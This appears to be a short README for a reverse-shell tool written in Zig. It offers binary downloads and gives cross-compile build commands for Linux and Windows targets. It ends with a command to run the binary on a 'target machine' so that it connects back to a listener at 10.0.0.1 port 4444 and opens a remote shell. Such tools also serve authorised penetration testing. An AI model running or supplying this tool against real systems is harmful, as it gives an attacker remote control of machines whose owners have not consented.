Get the binary for your target platform.
Linux: Download
Windows: Download
Clone the repository and build for your target platform:
# Linux target
zig build -Dtarget=x86_64-linux
# Windows target
zig build -Dtarget=x86_64-windowsAfter that, the executable is generated under zig-out/bin directory.
Execute the binary in your target machine:
./revshell 10.0.0.1 4444